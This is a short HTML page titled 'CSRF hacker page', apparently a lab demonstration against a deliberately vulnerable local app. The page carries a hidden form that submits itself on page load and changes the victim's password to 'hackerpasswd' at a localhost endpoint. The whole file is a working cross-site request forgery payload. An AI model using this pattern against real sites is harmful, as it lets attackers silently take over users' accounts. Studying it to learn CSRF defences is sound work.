<!DOCTYPE html>
<html>
    <head>
        <title>CSRF</title>
    </head>
    <body onload="submitForm()">
        <h1>CSRF hacker page</h1>

        <form id="hacker" action="http://localhost:3000/csrfvulnera/changePassword" method="post" hidden>
            <label for="passwd">New pasword:</label>
            <input type="text" id="passwd" name="passwd1" value="hackerpasswd">
            <label for="passwdrpt">Confirm password:</label>
            <input type="text" id="passwdrpt" name="passwd2" value="hackerpasswd">
            <input type="submit" value="Submit">
        </form>
        <script>
            function submitForm(){
                let form = document.querySelector("#hacker").submit()
            }
        </script>
    </body>
</html>